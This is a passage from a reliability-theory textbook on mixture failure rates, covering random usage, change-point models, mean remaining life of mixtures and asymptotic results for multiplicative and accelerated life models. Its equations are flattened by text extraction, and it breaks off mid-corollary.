followed by periods when the system is ‘off’. Assume that the system does not fail in the ‘off’ state. If chronological (calendar) time t is sufficiently large, the process can be considered stationary. The proportion of time when the system is operating in [0, t ) is approximately zt , 0 < z ≤ 1 in this case. Thus the relationship between the usage scale x and the chronological time scale t is x = zt , 0 < z ≤ 1 . (6.74) Equation (6.74) defines a scale transformation for the lifetime random variable in the following way: F (t , z ) ≡ F ( zt ) . Along with time scales x and t there can be other usage scales. For instance, in the automobile reliability application, the cumulative mileage y can play the role of this scale (Finkelstein, 2004a). Let parameter z turn into a random variable Z with the pdf π (z ) , which describes a random usage. In our terms, this is a mixture, i.e., 1 Fm (t ) = E[ F ( Zt )] = F (tu ) = ∫ F ( zt )π ( z )dz , 0 Mixture Failure Rate Modelling 165 where tu is an equivalent (deterministic) usage scale, which can also be helpful in modelling. Using the definition of the failure rate λ (t , z ) = f (t , z ) / F (t , z ) for this specific case λ (t , z ) = zλ ( zt ) . (6.75) The mixture failure rate is defined as 1 λm (t ) = ∫ zλ ( zt )π ( z | t )dz . (6.76) 0 Equation (6.75) defines the failure rate for a well-known accelerated life model (ALM) to be studied in the next chapter. It seems that there is only a slight difference in comparison with the multiplicative model (6.16), i.e., the multiplier z in the argument of the baseline failure rate λ (t ) , but it turns out that this difference makes modelling much more difficult. Example 6.9 Let the baseline failure rate be constant: λ (t ) = λ . Then λ (t , z ) = zλ . Assume that the mixing distribution is uniform: π ( z ) = 1, z ∈ [0,1] . Direct computation (Finkelstein, 2004a) results in λm (t ) = (1 − exp{−λt}) − λt exp{−λt} 1 → t (1 − exp{−λt ] t as t → ∞ . Thus, the failure rate in the calendar time scale is decreasing in [0, ∞) and is asymptotically approaching t −1 , whereas the baseline failure rate in the usage scale x is constant. This means that a random usage can dramatically change the shape of the corresponding failure rate. Let the baseline failure rate be an increasing power function (the Weibull law): λ (t ) = λt γ −1 ; λ > 0, γ > 1 . Equation (6.75) becomes λ (t , z ) = z γ λ . Assume for simplicity that the mixing random variable Z γ is also uniformly distributed in [0,1] . Direct integration in (6.76) (Finkelstein, 2004a) gives λm (t ) = γ [(1 − exp{−λb t γ }) − λb t exp{−λb t γ }] γ → as t → ∞ , t t (1 − exp{−λb t γ ] where λb = λ (γ ) −1 . The shape of λm (t ) is similar to the shape that was discussed while deriving Relationship (3.11) for the gamma-Weibull mixture in the multiplicative model. But this is not surprising at all, because for the baseline Weibull distribution only, the accelerated life model can be reparameterized to result in the multiplicative model (Cox and Oakes, 1984). As in Equation (3.11), λm (t ) in this case asymptotically tends to 0 , although the baseline failure rate is increasing. 6.7.3 Random Change Point In reliability analysis, it is often reasonable to assume that early failures follow one distribution (infant mortality), whereas after some time another distribution with 166 Failure Rate Modelling for Reliability and Risk another pattern comes into play. Alternatively, a device starting to function at some small level of stress can experience an increase of this stress at some instant of time t = z . Most often a change in the original pattern of the failure rate is caused by some external factors (e.g., a change in environment). The simplest failure rate change point model (Patra and Dey, 2002) is defined as λ (t , z ) = λ1 (t ) I (t < z ) + λ2 (t ) I (t ≥ z ), t ≥ 0 , (6.77) where λ1 (t ) is the failure rate before the change point, λ2 (t ) is the failure rate after it and I (t < z ), I (t ≥ z ) are the corresponding indicators. Denote the Cdfs that correspond to λ1 (t ), λ2 (t ) and λ (t , z ) by F1 (t ), F2 (t ) and F (t , z ) , respectively. The survival function corresponding to the failure rate λ (t , z ) is F (t , z ) = F1 (t ) I (t < z ) + F1 ( z ) F2 (t ) I (t ≥ z ) , F2 ( z ) where the definition of the mean remaining lifetime (2.3) is used. Assume now that the change point Z is a random variable. It is clear that this is a mixing model and we can use our expressions for π ( z | t ) and λm (t ) , i.e., ⎧ F1 (t ), t < z, ⎪ π (z | t) = ∞ ⎨ F1 ( z ) ⎪ F ( z ) F2 (t ), t ≥ z. F t z z dz ( , ) ( ) π ⎩ 2 ∫ π ( z) 0 Eventually, ∞ λm (t ) = t λ1 (t ) F1 (t ) ∫ π ( z )dz + λ2 (t ) F2 (t ) ∫ t ∞ 0 F1 ( z ) π ( z )dz F2 ( z ) t F ( z) F1 (t ) ∫ π ( z )dz + F2 (t ) ∫ 1 π ( z )dz F ( z) t 0 2 . (6.78) Let specifically λ1 (t ) = λ1 , λ2 (t ) = λ2 and π (z ) also be an exponential distribution with parameter λc . Equation (6.78) simplifies to λ2 λc (1 − exp{−(λ2 − λ1 − λc }t ) λ2 − λ1 − λc λm (t ) = . λc 1+ (1 − exp{−(λ2 − λ1 − λc }t ) λ2 − λ1 − λc λ1 + It is clear that λm (0) = λ1 . Let λ2 > λ1 + λc . Then lim t →∞ λm (t ) = λ1 + λc . (6.79) Mixture Failure Rate Modelling 167 It can be shown that λ ′(t ) > 0, ∀t ≥ 0 , which means that λ (t ) monotonically increases from λ1 to λ1 + λc as t → ∞ . Let λ1 < λ2 < λ1 + λc . It follows from Equation (6.79) that lim t →∞ λm (t ) = λ2 . (6.80) Finally, (6.80) also holds for λ2 < λ1 . Therefore, limt → ∞ λ (t ) in this special case depends on the relationships between λ1 , λ2 and λc . 6.7.4 MRL of Mixtures The MRL function was defined by Equation (2.7). Along with the failure rate, this is also the most important characteristic of a lifetime random variable. The MRL function can constitute a convenient and reasonable model of mixing in applications, although we think that this approach has not received the proper attention in the literature so far. In accordance with (2.7), the MRL can be defined for each value of z via the corresponding survival function as ∞ m(t , z ) = ∫ F (u, z )du t F (t , z ) . (6.81) Substitution of the mixture survival function Fm (t ) instead of F (t ) in the righthand side of Equation (2.7) results in the following formal definition of the mixture MRL function: ∞ mm (t ) = ∞∞ Fm (u )du t Fm (t ) = ∫ ∫ F (u, z )π ( z )dθdu t 0 ∞ . (6.82) F (t , z )π (θ )dz 0 Assuming that the integrals in (6.82) are finite, we can transform this equation by changing the order of integration, i.e., ∞∞ mm (t ) = ∫∫ F (u, z )π ( z )dzdu t 0 ∞ ∫ F (t , z )π ( z )dz = m(t , z )π ( z | t ) dz , (6.83) 0 0 where, in accordance with Equation (3.10), the conditional density π ( z | t ) of the 168 Failure Rate Modelling for Reliability and Risk mixing variable Z (on the condition that T > t ) is π (z | t) = π ( z ) F (t , z ) ∞ . ∫ F (t , z )π ( z )dz 0 Therefore, formal definition (6.82) is equivalent to a self-explanatory mixing rule (6.83). Equation (6.83) enables us to analyse the shape of mm (t ) . It can also be done directly via Equation (6.82) or via the corresponding mixture failure rate λm (t ) , because sometimes it is more convenient to define λm (t ) from the very beginning. It is clear that if λm (t ) is increasing (decreasing) in [0, ∞) , then mm (t ) is decreasing (increasing) in [0, ∞) . It also follows from the results of Section 2.4 that if, for example, λm (t ) has a bathtub shape and condition mm′ (0) < 0 takes place, then the MRL function mm (t ) is decreasing in [0, ∞) . It can be shown that under some assumptions mixtures of increasing MRL distributions also have increasing MRL functions. Mixing in Equations (6.82) and (6.83) is defined by the ‘ordinary’ mixture of the corresponding distribution. The model of mixing, however, can be defined directly by m(t , z ) as well. The simplest natural model of this kind is m(t , z ) = m(t ) ,z>0, z (6.84) which is similar to the multiplicative model of mixing for the failure rate. This model was considered in Zahedi (1991) for modelling the impact of an environment as an alternative to the Cox PH model. Some ageing properties of mixtures, defined by Relation (6.84), were described by Badia et al. (2001). Properties of the mixture MRL function were also analysed in Mi (1999) and Finkelstein (2002a), among others. 6.8 Chapter Summary The mixture failure rate λm (t ) is defined by Equation (6.5) as a conditional expectation of a random failure rate λ (t , Z ) . A family of failure rates of subpopulations λ (t , z ), z ∈ [a, b] describes heterogeneity of a population itself. Our main interest in this chapter is in failure rate modelling for heterogeneous populations. One can hardly find homogeneous populations in real life, although most studies on failure rate modelling deal with a homogeneous case. Neglecting existing heterogeneity can lead to substantial errors and misconceptions in stochastic analysis in reliability, survival and risk analysis and other disciplines. It is well known that mixtures of DFR distributions are always DFR. On the other hand, mixtures of increasing failure rate (IFR) distributions can decrease at least in some intervals of time, which means that the IFR class of distributions is not closed under the operation of mixing. As IFR distributions usually model lifetimes governed by ageing processes, the operation of mixing can dramatically change the pattern of ageing, e.g., from positive ageing (IFR) to negative ageing (DFR). Mixture Failure Rate Modelling 169 The mixture failure rate is bent down due to “the weakest populations are dying out first” effect. This should be taken into account when analysing the failure data for heterogeneous populations. If mixing random variables are ordered in the sense of the likelihood ratio, the mixture failure rates are ordered accordingly. Mixing distributions with equal expectations and different variances can lead to the corresponding ordering for mixture failure rates in some special cases. For the general mixing distribution in the multiplicative model, however, this ordering is guaranteed only for a sufficiently small amount of time. The problem with random usage of engineering devices can be reformulated in terms of mixtures. This is done for the automobile example in Section 6.7.2, where the behaviour of the mixture failure rate was analysed for this special case. The mixture MRL function mm (t ) is defined by Equation (6.83) and can be studied in a similar way to λm (t ) , but this topic needs further attention. Alternatively, it can be defined in a direct way, e.g., as in an inverse-proportional model (6.84). 7 Limiting Behaviour of Mixture Failure Rates 7.1 Introduction In this chapter, we obtain explicit asymptotic results for the mixture failure rate λm (t ) as t → ∞ . A general class of distributions is suggested that contains as special cases additive, multiplicative and accelerated life models that are widely used in practice. Although the accelerated life model (ALM) is the main tool for modelling and statistical inference in accelerated life testing (Bagdonavicius and Nikulin, 2002), there are practically no results in the literature on the mixture failure rate modelling for this model. One could mention some initial descriptive findings by Anderson and Louis (1995) and analytical derivation of bounds for the distance of a mixture from a parental distribution in Shaked (1981). The approach developed in this chapter allows for the asymptotic analysis of the mixture failure rates for the ALM and, in fact, results in some counterintuitive conclusions. Specifically, when the support of the mixing distribution is [0, ∞) , the mixture failure rate in this model converges to 0 as t → ∞ and does not depend on the baseline distribution. On the other hand, the ultimate behaviour of λm (t ) for other models depends on a number of factors, and specifically on the baseline distribution. Depending on the parameters involved, it can converge to 0 , tend to ∞ or exhibit some other behaviour. There are many applications where the behaviour of the failure rate at relatively large values of t is really important. In the previous chapter, the example of the oldest-old mortality was discussed when the exponentially increasing Gompertz mortality curve is bent down for advanced ages (mortality plateau). As we already stated, owing to the principle “the weakest populations are dying out first”, many mixtures with the IFR baseline failure rate exhibit (at least ultimately) a decreasing mixture failure rate pattern. This change of the ageing pattern should definitely be taken into account in many engineering applications as well. For instance, what is the reason for the preventive replacement of an ageing item if, owing to heterogeneity, the ‘new’ item can have a larger failure rate and therefore be less reliable? In spite of the mathematically intensive contents, this chapter presents a number of clearly formulated results that can be used in practical analysis. The developed approach is different from that described in Block et al. (1993, 2003) and Li (2005) and, in general, follows Finkelstein and Esaulova (2006a). On 172 Failure Rate Modelling for Reliability and Risk one hand, we obtain explicit asymptotic formulas in a direct way; on the other hand, we are also able to analyse some useful general asymptotic properties of the models. In Section 7.5, we discuss the multivariate frailty in the competing risks framework. This discussion is based on the generalization of the univariate approach to the bivariate case. The presentation of this chapter is rather technical. Therefore, the sketches of the proofs are deferred to Section 7.7 and can be skipped by the reader who is uninterested in mathematical details. First, we turn to some introductory results for the limiting behaviour of discrete mixtures that will help in understanding the nature of the limiting behaviour, when λm (t ) tends to the failure rate of the strongest population. 7.2 Discrete Mixtures Let the frailty (unobserved random parameter) Z for the lifetime T be a discrete random variable taking values in a set z1 , z 2 ,..., z n with probabilities π i ( zi ), i = 1,2,..., n , respectively. This discrete case can be very helpful for understanding certain basic issues for a more ‘general’ continuous setting. Some initial properties for discrete mixtures were already discussed in Section 6.2. In this section, the mixture of two distributions will be considered and it will be shown under some weak assumptions that the corresponding mixture failure rate is converging to the failure rate of the strongest population. This result is obviously important from both a theoretical and a practical point of view, as it explains certain facts that were already observed for various special cases. Similar to the continuous case, the mixture failure rate can be defined as n λm (t ) = ∑ λ (t , zi )π ( zi | t ) , (7.1) 1 where conditional probabilities π ( zi | t ) of Z = zi given T > t , i = 1,2,..., n are π ( zi | t ) = π ( zi ) F (t , zi ) n ∑ F (t, z )π ( z ) i . (7.2) i 1 Note that Equations (7.1) and (7.2) define the mixing model governed by the distribution F (t , zi ) indexed by the discrete random variable Z . This setting is basic and is suitable for describing heterogeneity via the unobserved parameter Z . The multiplicative model (6.16), which will be studied in this section, is defined for the discrete case in a similar way as λ (t , zi ) = zi λ (t ) , (7.3) where λ (t ) is a baseline failure rate. Therefore, as in (6.17), Equation (7.1) reads λm (t ) = λ (t ) E[ Z | t ] . Limiting Behaviour of Mixture Failure Rates 173 Let, for simplicity, n = 2 . The following results can easily be adjusted to the general case. Denote π ( z1 ) = π 1 , π ( z 2 ) = π 2 = 1 − π 1 and let z 2 > z1 > 0 . Then λm (t ) = λ (t , z1 )π ( z1 | t ) + λ (t , z 2 )π ( z 2 | t ), (7.4) where π ( zi | t ) = π i F (t , zi ) , i = 1,2 . π 1 F (t , z1 ) + π 2 F (t , z 2 ) (7.5) Example 7.1 Consider the Weibull distribution of the following form: F (t , zi ) = exp{− zi t b } ; λ (t , zi ) = zi bt b−1 ; b > 1, i = 1,2 . Thus, in accordance with (7.4) and (7.5), the corresponding mixture failure rate for the multiplicative model is λm (t ) = z1bt b−1 + z 2bt b−1 π 1 exp{− z1t b } π 1 exp{− z1t b } + π 2 exp{− z 2t b } π 2 exp{− z 2t b } . π 1 exp{− z1t b } + π 2 exp{− z 2t b } These equations suggest that when t → ∞ , λm (t ) − λ (t , z1 ) = ( z 2 − z1 )bt b−1 π2 exp{−( z 2 − z1 )t b }(1 + o(1) ) → 0 , π1 (7.6) and the mixture failure rate, as t → ∞ , converges to the failure rate of the strongest population from above. When b = 1 , the setting reduces to the well-known exponential case (Barlow and Proschan, 1975). Although the failure rate λ (t , z1 ) in this example is increasing as a power function, the distance between it and the mixture failure rate λm (t ) tends to 0 as t → ∞ . For the general setting (7.4), when λ (t , z1 ) → ∞ , we will distinguish between the convergence λm (t ) − λ (t , z1 ) → 0 as t → ∞ (7.7) and the following asymptotic equivalence: λm (t ) = λ (t , z1 )(1 + o(1)) as t → ∞ , (7.8) 174 Failure Rate Modelling for Reliability and Risk which will mostly be used in this chapter in the following alternative notation (Relationship (2.54)): λm (t ) ~ λ (t , z1 ) as t → ∞ . It is obvious that when λ (t , z1 ) has a finite limit, then (7.7) and (7.8) coincide. The main limiting results of this chapter will be asymptotic in the sense of Relationship (7.8), but the following theorem refers to both notions. Theorem 7.1. Consider the mixture model (7.4) and (7.5). Let λ (t , z1 ) = z1λ (t ), λ (t , z 2 ) = z 2 λ (t ); z 2 > z1 > 0 , where λ (t ) → ∞ as t → ∞ . Then • • Relationship (7.8) holds; Relationship (7.7) holds if t λ (t ) exp{−( z 2 − z1 ) ∫ λ (u )du} → 0 as t → ∞ . (7.9) 0 Proof. Denote c ≡ z 2 / z1 > 1. Using simple transformations, similar to Block and Joe (1997): λm (t ) π 1 (c − 1) . = 1+ λ (t , z1 ) π 1 + π 2 ( F (t , z1 ))1−c As F (t , z1 ) → 0 for t → ∞ , we immediately arrive at (7.8), whereas the condition λ (t , z1 )( F (t , z1 )) c−1 → 0 as t → ∞ , which is equivalent to (7.9), leads to the convergence result (7.7). It is clear that this theorem holds when lim λ (t ) is constant as t → ∞ . In this case (7.7) and (7.8) coincide. Similar results for the discrete mixture of different distributions can be found in Block and Joe (1997) and Block et al. (2003). See also Vaupel and Yashin (1985) for some meaningful illustrative graphs. Remark 7.1 Condition (7.9) is a rather weak one. In essence, it states that the pdf of a distribution with an ultimately increasing failure rate tends to 0 as t → ∞ . All distributions that are typically used in lifetime data analyses meet this requirement. But one can consider some ‘bizarre’ distributions, for which Condition (7.9) does not hold. Let, for instance, λ (t ) = β n+1 , t ∈ [n, n + 1), n = 0,1,2,.. , Limiting Behaviour of Mixture Failure Rates 175 where ⎧ n β1 = 1, β n+1 = exp⎨∑ β i ⎬; n = 1,2,... . ⎩ i =1 The failure rate λ (t ) defined in this way is a piecewise continuous function. It is easy to verify in this case that (7.9) does not hold. Therefore, there is no convergence defined by Relationship (7.7). The author would like to thank Professors Henry Block and Thomas Savits for this example. The rest of this chapter is devoted to a much more general continuous mixing model, which includes, as already mentioned, the additive, the multiplicative and the accelerated life models as special cases. 7.3 Survival Model We will define now a rather general class of lifetime distributions F (t , z ) and we will study the asymptotic behaviour of the corresponding mixture failure rate λm (t ) in the mixing model (6.4) and (6.5). It is more convenient from the start to give this definition in terms of the cumulative failure rate Λ(t , z ) rather than in terms of the failure rate λ (t , z ) . The basic model is given by the following general equation: t Λ (t , z ) = A( zφ (t )) + ψ (t ), Λ (t , z ) ≡ ∫ λ (t , z ) . (7.10) 0 The natural properties of the cumulative failure rate of the absolutely continuous distribution F (t , z ) (for ∀z ∈ [0, ∞) ) imply that the functions A( s ), φ (t ) and ψ (t ) are differentiable, that the right-hand side of (7.10) is non-decreasing in t and tends to infinity as t → ∞ , and that A( zφ (0)) +ψ (0) = 0 . Therefore, these properties will be assumed throughout the chapter, although some of them will not be needed in the formal proofs. An important additional simplifying assumption is that the functions A( s ), s ∈ [0, ∞); φ (t ), t ∈ [0, ∞) are increasing functions of their arguments, and therefore we will view 1 − exp{− A( zφ (t )), z ≠ 0 as a lifetime Cdf. The failure rate λ (t , z ) is obtained by differentiation of the cumulative failure rate Λ(t , z ) , i.e., λ (t , z ) = zφ ′(t ) A′( zφ (t )) +ψ ′(t ) . (7.11) 176 Failure Rate Modelling for Reliability and Risk We are now able to explain why we start with the cumulative failure rate rather than with the failure rate itself, as is often done in lifetime modelling. The reason is that we can easily suggest intuitive interpretations for (7.10), whereas it is certainly not so simple to interpret the failure rate structure of the form (7.11) without stating that it follows from the structure of the cumulative failure rate. Relationship (7.10) defines a rather broad class of survival models that can be used, e.g., for modelling the impact of environment on characteristics of survival. The obvious restriction of the model is the multiplicative nature of the argument zφ (t ) , which can easily be generalized to g ( z )φ (t ) , but not to a general function of t and z . From a practical point of view, Relationship (7.10) is general enough and, as was already mentioned, includes as specific cases the proportional hazards (PH), additive hazards (AH) and accelerated life (ALM) models that are widely used in reliability, survival and risk analysis. PH (multiplicative) Model: Let A(u ) ≡ u , φ (t ) = Λ (t ), ψ (t ) ≡ 0 . Then t λ (t , z ) = zλ (t ), Λ (t , z ) = zΛ (t ) = z ∫ λ (u )du . (7.12) 0 ALM: Let A(u ) ≡ Λ (u ), φ (t ) = t , ψ (t ) ≡ 0 . Then tz Λ (t , z ) = ∫ λ (u )du = Λ (tz ), λ (t , z ) = zλ (tz ) . (7.13) 0 AH Model: Let A(u ) ≡ u, φ (t ) = t , ψ (t ) is increasing, ψ (0) = 0 . Then λ (t , z ) = z +ψ ′(t ), Λ(t , z ) = zt +ψ (t ) . (7.14) Equations (7.12)–(7.14) show that even the simplest forms of the functions involved result in a number of well-known models. The functions λ (t ) and ψ ′(t ) play the role of baseline failure rates in Equations (7.12)–(7.13) and (7.14). Note that, in all these models, the functions φ (t ) and A(s ) are monotonically increasing. The asymptotic behaviour of mixture failure rates for the PH and AH models was studied for some specific mixing distributions in, e.g., Gurland and Sethuraman (1995) and Finkelstein and Esaulova (2001). Theorem 6.1 of the previous Limiting Behaviour of Mixture Failure Rates 177 chapter also describes the ultimate behaviour of the mixture failure rate in the AH model. 7.4 Main Asymptotic Results In this section, the main asymptotic results are formulated and discussed. The proofs are rather technical and cumbersome. Therefore, the corresponding sketches are deferred to the last section of this chapter. As the methodology of the proofs is innovative and important for the developed approach, we feel that the reader should have an opportunity to follow the abridged versions. The full text of the proofs and some additional results can be found in Finkelstein and Esaulova (2006a). The following theorem derives an asymptotic formula for the mixture failure rate λm (t ) under rather mild assumptions. Theorem 7.2. Let the cumulative failure rate Λ(t , z ) be given by Model (7.10) and let the mixing pdf π ( z ), z ∈ [0, ∞) be defined as π ( z ) = zα π1 ( z ) , (7.15) where α > −1 and π 1 ( z ), π 1 (0) ≠ 0 is a function bounded in [0, ∞) and continuous at z = 0 . Assume also that φ (t ) → ∞ as t → ∞ (7.16) and that A(s ) satisfies ∞ ∫ exp{− A(s)}s α ds < ∞ . (7.17) 0 Then λm (t ) −ψ ′(t ) ~ (α + 1) φ ′(t ) . φ (t ) (7.18) Specifically, if the additive term is equal to zero (this term is, in fact, not important, as all conditions are formulated in terms of the functions A( s ), φ (t ) and π 1 ( z ) ), Equation (7.18) reduces (as t → ∞ ) to λm (t ) ~ (α + 1) φ ′(t ) . φ (t ) (7.19) Remark 7.2 Assumption (7.15) holds for the main lifetime distributions, such as Weibull, gamma, lognormal, etc. Assumption (7.16) states a natural condition for the function φ (t ) , which can often be viewed as a scale transformation. Condition (7.17) means that the Cdf 1 − exp{− A( s )) should not be ‘too heavy-tailed’ (as, e.g., is the Pareto distribution 1 − s − β , for s ≥ 1, β − α > 1 ) and is equivalent to the condition of the existence of the moment of order α + 1 for this Cdf. Examples in the 178 Failure Rate Modelling for Reliability and Risk next section will clearly show that these conditions are not at all stringent and can easily be met in most practical situations. A crucial feature of this result is that the asymptotic behaviour of the mixture failure rate depends only (omitting an obvious additive term) on the behaviour of the mixing distribution in the neighbourhood of 0 and on the derivative of the logarithm of the scale function φ (t ) : (log φ (t ))′ = φ ′(t ) / φ (t ) . When π (0) ≠ 0 and π (z ) is bounded in [0, ∞) , the result does not depend on the mixing distribution at all, as α = 0 in this case. The following example shows that the asymptotic relationship for λm (t ) could be different if the behaviour of the mixing distribution at z = 0 does not comply with Condition (7.15). Example 7.2 Consider the multiplicative model (7.12) and let the mixing density be given by π ( z) = 1 πz z exp{−1 / z} . It can be shown by direct integration in (6.5) that λm (t ) = λ (t ) Λ (t ) , which definitely differs from (7.19). It will be shown in the next section that for the multiplicative model, Relationship (7.19) implies that λm (t ) ~ (α + 1)λ (t ) / Λ (t ) . Theorem 7.2 deals with the case when the support of a mixing distribution includes 0 , i.e., z ∈ [0, ∞) . In this case, the strongest population for ψ ′(t ) = 0 is not usually defined as, e.g., in multiplicative and accelerated life models. For a specific additive model and for Model (7.11) with ψ ′(t ) ≠ 0 , the strongest population can formally be defined as, e.g., λ (t ,0) = ψ ′(t ) . If, however, the support is separated from 0 , the situation changes significantly and the mixture failure rate can tend to the failure rate of the strongest population as t → ∞ , even when the additive term in (7.11) is 0 . The following theorem states reasonable conditions for that, and we assume, for simplicity, that ψ (t ) = 0 . Theorem 7.3. Let, as in Theorem 7.2, the class of lifetime distributions be defined by Equation (7.10), where φ (t ) → ∞ , and let A(s ) be twice differentiable. Assume that, as s → ∞ A′′( s ) →0 ( A′( s )) 2 (7.20) sA′(s ) → ∞ . (7.21) and Limiting Behaviour of Mixture Failure Rates 179 Also assume that for all b, c > a, b < c , the quotient A′(bs) / A′(cs) is bounded as s → ∞ . Finally, let the mixing pdf π (z ) be defined in [a, ∞), a > 0 , bounded in this interval and continuous at z = a and let it satisfy π (a) ≠ 0 . Then λm (t ) ~ aφ ′(t ) A′(aφ (t )). (7.22) Remark 7.3 There are many assumptions in this theorem, but they are rather natural and hold at least for the specific models under consideration. It can easily be verified that Conditions (7.20) and (7.21) trivially hold for the specific multiplicative and additive models of the previous section. We will discuss these conditions later within the framework of the ALM. More generally, the conditions of the theorem hold if A(s ) belongs to a rather wide class of functions of smooth variation (Bingham et al., 1987). Assume additionally that the family of failure rates (7.11) is ordered in z , at least ultimately (for large t ), i.e., λ (t , z1 ) < λ (t , z 2 ), z1 < z 2 , ∀z1 , z 2 ∈ [ z0 , ∞], z0 ≥ 0, t ≥ 0 . (7.23) Then, as mentioned, Theorem 7.3 can be interpreted via the principle that the mixture failure rate converges to the failure rate of the strongest population. The right-hand side of (7.22) can also be interpreted in this case as the failure rate of the strongest population for a survival model, defined by a random variable with the Cdf 1 − exp{ A( zφ (t )} ). 7.5 Specific Models 7.5.1 Multiplicative Model The general definition of the mixture failure rate in (6.5) for the multiplicative model (7.12) reduces to ∞ λm (t ) = ∫ zλ (t ) exp{− zΛ(t )}π ( z )dz 0 . (7.24) ∫ exp{− zΛ(t )}π ( z)dz 0 As A(u ) ≡ u, φ (t ) = Λ (t ), ψ (t ) ≡ 0 in this specific case, Theorems 7.2 and 7.3 simplify to the following corollaries. Corollary 7.1. Assume that the mixing pdf π ( z ), z ∈ [0, ∞) in Model (7.12) can be written as π ( z ) = zαπ1 ( z ) , (7.25) where α > −1 and π 1 ( z ) is bounded in [0, ∞) , continuous at z = 0 , and satisfies π 1 (0) ≠ 0 . 180 Failure Rate Modelling for Reliability and Risk Then the mixture failure rate for Model (7.12) has the following asymptotic behaviour: λm (t ) ~ (α + 1)λ (t ) t . (7.26) ∫ λ (u)du 0 Corollary 7.2. Assume that the mixing pdf π ( z ), z ∈ [a, ∞) in (7.12) (we can define π ( z ) = 0 for z ∈ [0, a )) is bounded, right semicontinuous at z = a , and satisfies π (a) ≠ 0 . Then, in accordance with (7.22), the mixture failure rate for Model (7.12) has the following asymptotic behaviour: λm (t ) ~ aλ (t ) . (7.27) Corollary 7.1 states a remarkable fact: the asymptotic behaviour of the mixture failure rate λm (t ) depends only on the behaviour of the mixing pdf in the neighbourhood of z = 0 and the baseline failure rate λ (t ) . Corollary 7.2 describes the convergence of a mixture failure rate to the mixture failure rate of the strongest population. In this simple multiplicative case, the family of the failure rates is trivially ordered in z and the strongest population has the failure rate aλ (t ) . The next theorem generalizes the result of Corollary 7.2. Theorem 7.4. Assume that the mixing pdf π (z ) in (7.12) has a support in [a, b], a > 0, b ≤ ∞ , and, for z ≥ a , can be defined as π ( z ) = ( z − a )α π 1 ( z − a ) , (7.28) where α > −1 and π 1 ( z − a ) is bounded in z ∈ [a, b] , with π 1 (0) ≠ 0 . Then λm (t ) ~ aλ (t ) . (7.29) as t → ∞ . It is quite remarkable that this asymptotic result does not depend on a mixing distribution (even in the case of a singularity at z = a ). Relationship (7.29) also describes the convergence to the failure rate of the strongest population, which differs dramatically from the convergence described by (7.26). The explanation of this difference is quite obvious: owing to the multiplicative nature of the model, the behaviour of zλ (t ) in the neighbourhood of z = 0 (for Density (7.25)) is different from the behaviour of this product in the neighbourhood of z = a (for Density (7.28)). Thus, the effect of a multiplier z → 0 is a decisive factor for the shape of the function on the right-hand side of (7.26). Limiting Behaviour of Mixture Failure Rates 181 Example 7.3 Let the mixing distribution be the gamma distribution with the pdf π ( z) = β c z c−1 Γ (c ) exp{− βz}; c, β > 0 , where the notation for the shape parameter was changed to c in order to avoid a confusion with parameter α in (7.26). Owing to the results of Section 6.4, the exact formula for the mixture failure rate in this case is given by λm (t ) = cλ (t ) = β + Λ (t ) cλ (t ) t . (7.30) β + ∫ λ (u )du 0 It is clear that, as Λ(t ) → ∞ for t → ∞ and c = α + 1 for the gamma pdf, this formula perfectly complies with the general asymptotic result (7.26). It follows from Equation (3.11) that, as t → ∞ , the gamma mixture for the baseline Weibull distribution is asymptotically proportional to 1 / t , which also complies with (7.26). Example 7.4 Consider the gamma mixture for the baseline Gompertz distribution with the failure rate λ (t ) = a exp{bt}, a, b > 0 . Computation in accordance with Equation (7.30) for this baseline failure rate results in λm (t ) = bc exp{b t} . ⎛ bβ ⎞ − 1⎟ exp{b t} + ⎜ ⎝ a ⎠ (7.31) If bβ = a , then λm (t ) ≡ bc . However, if bβ > a , then λm (t ) increases to bc and if bβ < a , it decreases to bc . The corresponding graph is given in Figure 7.1. m(t) b a t Figure 7.1. Gamma-Gompertz mixture failure rate 182 Failure Rate Modelling for Reliability and Risk Obviously, Relationship (7.26) gives the same asymptotic value bc for t → ∞ as the exact Equation (7.31). Thus, we are mixing exponentially increasing failure rates and as a result obtaining a slowly increasing (decreasing) mixture failure rate, which converges to a constant value. We already mentioned that this important example models the deceleration of human mortality at advanced ages (the mortality plateau). 7.5.2 Accelerated Life Model Although Equation (7.13) is also simple in this case, the presence of a mixing parameter z in the arguments makes the corresponding analysis of the mixture failure rate more complex than for the multiplicative model. Similar to (7.24), the mixture failure rate in this specific case is defined as ∞ λm (t ) = ∫ zλ (tz ) exp{−Λ(tz ))π ( z )dz 0 . (7.32) ∫ exp{−Λ(tz))π ( z )dz 0 The asymptotic behaviour of the mixture failure rate λm (t ) can be described as a specific case of Theorem 7.2 with A( s ) = Λ ( s ) , φ (t ) = t and ψ (t ) ≡ 0 . Corollary 7.3. Assume that the mixing pdf π ( z ), z ∈ [0, ∞) can be defined as π ( z ) = z α π 1 ( z ) , where α > −1 and π 1 ( z ) is continuous at z = 0 and bounded in [0, ∞) , π 1 (0) ≠ 0 . Let the baseline distribution with the cumulative failure rate Λ (t ) have a moment of order α + 1 . Then the asymptotic behaviour of the mixture failure rate for the ALM (7.13) is given by α +1 λm (t ) ~ (7.33) t as t → ∞ . The conditions of Corollary 7.3 are not that strong and are relatively natural. Most of the widely used lifetime distributions have moments of all orders. The Pareto distribution will be discussed in the next example. As stated, the conditions on the mixing distribution hold for, e.g., the gamma and the Weibull distributions, which are commonly used as mixing distributions. Note that Relationship (7.33) is a surprising result, at least at first sight, as it does not depend on the baseline distribution. It is also dramatically different from the multiplicative case (7.26). The following example shows other possibilities for the asymptotic behaviour of λm (t ) when one of the conditions of Corollary 7.3 does not hold. Example 7.5 Consider the gamma mixing distribution with the scale parameter equal to 1 , i.e., π ( z ) = zα exp{− x} / Γ(α + 1) . Let the baseline distribution be the Pareto distribution with the pdf f (t ) = β / t β +1 t ≥ 1, β > 0 . Limiting Behaviour of Mixture Failure Rates 183 For β > α + 1 , the conditions of Corollary 7.3 and Relationship (7.33) hold. Let β ≤ α + 1 , which means that the baseline distribution does not have an (α + 1) th moment. Then one of the conditions of Corollary 7.3 is violated. In this case, it can be shown by direct derivation (Finkelstein and Esaulova, 2006a) that, as t → ∞ λm (t ) ~ β t . (7.34) Although the dependence on time in (7.34) is the same as in (7.33), the mixture failure rate in this case depends on the baseline distribution via the parameter β . Both relationships can be combined as λm (t ) ~ min( β ,α + 1) . t It can be shown that the same asymptotic relationship holds not only for the gamma distribution, but also for any other mixing distribution π (z ) of the form π ( z ) = z α π 1 ( z ) . If β > α + 1 , the function π 1 ( z ) should be bounded and π 1 (0) ≠ 0 . As A( s ) = Λ ( s ) and φ (t ) = t , Theorem 7.3 simplifies to the following corollary. Corollary 7.4. Assume that the mixing pdf 